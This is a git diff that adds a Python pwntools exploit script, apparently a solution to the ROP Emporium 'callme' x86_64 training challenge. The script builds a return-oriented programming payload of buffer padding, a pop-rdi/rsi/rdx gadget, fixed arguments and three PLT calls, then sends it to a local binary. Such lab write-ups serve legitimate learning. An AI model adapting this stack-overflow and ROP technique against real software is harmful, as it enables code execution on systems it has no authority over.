diff options
Diffstat (limited to 'x86_64')
| -rwxr-xr-x | x86_64/callme/exploit.py | 50 |
1 files changed, 50 insertions, 0 deletions
diff --git a/x86_64/callme/exploit.py b/x86_64/callme/exploit.py new file mode 100755 index 0000000..2f7d8db --- /dev/null +++ b/x86_64/callme/exploit.py @@ -0,0 +1,50 @@ +#!/usr/bin/env python3 +from pwn import * + +usefulGadgets = p64(0x000000000040093c) +# pop rdi +# pop rsi +# pop rdx +# ret + +arg1 = p64(0xdeadbeefdeadbeef) +arg2 = p64(0xcafebabecafebabe) +arg3 = p64(0xd00df00dd00df00d) + +callme_1_plt = p64(0x0000000000400720) +callme_2_plt = p64(0x0000000000400740) +callme_3_plt = p64(0x00000000004006f0) + + + + +prog = process('./callme') +payload = b'' +for c in range(40): + payload += b'a' + +payload += usefulGadgets +payload += arg1 +payload += arg2 +payload += arg3 +payload += callme_1_plt + +payload += usefulGadgets +payload += arg1 +payload += arg2 +payload += arg3 +payload += callme_2_plt + +payload += usefulGadgets +payload += arg1 +payload += arg2 +payload += arg3 +payload += callme_3_plt + + + + +payload += b"\n" +prog.sendline(payload) +sleep(1) +print(str(prog.recv(), 'UTF-8')) |